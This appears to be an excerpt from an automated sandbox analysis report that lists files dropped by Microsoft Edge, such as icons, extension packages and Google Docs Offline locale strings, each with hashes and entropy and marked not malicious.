                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):58019
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.6197203554676864
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:vBibeJ78pJujohmmj4hHIcrPz/M7tHLutxdms:vBB8KUhmmj4hHIcrPz/M7tHmn
                                                                                                                                                                                                                                                                                                                                    MD5:790E9302AA3C93C37885550D15F8C9BF
                                                                                                                                                                                                                                                                                                                                    SHA1:7F976D821155A87F49081DFFE791D0ED8B2E5494
                                                                                                                                                                                                                                                                                                                                    SHA-256:B7EBEEE8A12C8451AD5D21C203DF2FFDC64C16F0A16FF881912C1B810211C78A
                                                                                                                                                                                                                                                                                                                                    SHA-512:5BC312C264F1838E06AFE1DD44C6DAC6C74210DE34E82E915A57190E1BD6EE5CE86C6A38C811C76A965ED40ADE835320524BCACB3486B50FDEE93FDEC64060DF
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...qiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:695f8e9f-409d-324a-b50a-1e3067707628" xmpMM:DocumentID="xmp.did:91EA24D7191011E5B1FF9488C51C29D1" xmpMM:InstanceID="xmp.iid:91EA24D6191011E5B1FF9488C51C29D1" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6a6b844a-8117-4c4c-9b2f-30d3769ed7c7" stRef:documentID="xmp.did:695f8e9f-409d-324a-b50a-1e3067707628"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>^.i.....IDATx.bb .0..;./..;@...A.P9F...y
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):154477
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                                                    MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                                                    SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                                                    SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                                                    SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2110
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.420163397349402
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rr2:8e2Fa116uCntc5toYJNxM
                                                                                                                                                                                                                                                                                                                                    MD5:BB0F1EB836368622B90F0F38B7110B93
                                                                                                                                                                                                                                                                                                                                    SHA1:893B24E1816E4A2A009C50207233DA4D08AF62DF
                                                                                                                                                                                                                                                                                                                                    SHA-256:958AB66910443536412C74735BDEF96E9E0D56568541EB172597FA77FBC25D29
                                                                                                                                                                                                                                                                                                                                    SHA-512:E7139D5C5848F12A3FCEF23EB0541FF9D8B1C4022BE6625C483E14F4455193AA91A424D25FD20B7E401B2C95216846F752CE4271FEE4503FFE912E36BDC5D39D
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):154477
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                                                    MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                                                    SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                                                    SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                                                    SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):4982
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                                                    MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                                                    SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                                                    SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                                                    SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):908
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                                                    MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                                                    SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                                                    SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                                                    SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1285
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                                                    MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                                                    SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                                                    SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                                                    SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1244
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                                                    MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                                                    SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                                                    SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                                                    SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):977
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                                                    MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                                                    SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                                                    SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                                                    SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):3107
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                                                    MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                                                    SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                                                    SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                                                    SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1389
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                                                    MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                                                    SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                                                    SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                                                    SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1763
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                                                    MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                                                    SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                                                    SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                                                    SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):930
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                                                    MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                                                    SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                                                    SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                                                    SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                                                    Malicious:false
